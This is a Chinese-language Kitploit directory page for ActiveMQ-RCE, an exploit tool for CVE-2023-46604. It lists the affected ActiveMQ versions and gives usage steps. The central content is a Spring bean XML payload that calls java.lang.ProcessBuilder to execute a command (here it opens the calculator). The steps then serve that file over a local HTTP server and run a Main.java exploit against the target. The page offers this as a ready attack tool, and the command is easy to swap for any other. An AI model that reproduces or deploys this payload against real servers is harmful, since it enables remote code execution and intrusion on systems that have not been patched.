Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ActiveMQ-RCE — CVE-2023-46604 | Kitploit
工具/GitHubGitHub/trganda/activemq-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubtrganda/activemq-rce

ActiveMQ-RCE

CVE-2023-46604

查看仓库
2882年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ActiveMQ RCE

受影响版本

  • verison < 5.18.3
  • version < 5.17.6
  • version < 5.16.7
  • version < 5.15.16

使用方法

创建 spring bean 的 XML 文件

root@kitploit:~
<?xml version="1.0" encoding="UTF-8" ?>
  <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
      <constructor-arg >
        <list>
            <value>open</value>
            <value>-a</value>
            <value>calculator</value>
        </list>
      </constructor-arg>
    </bean>
  </beans>

开启一个 http 服务

root@kitploit:~
python3 -m http.server

运行 Main.java 文件(根据需要修改地址)。

下载工具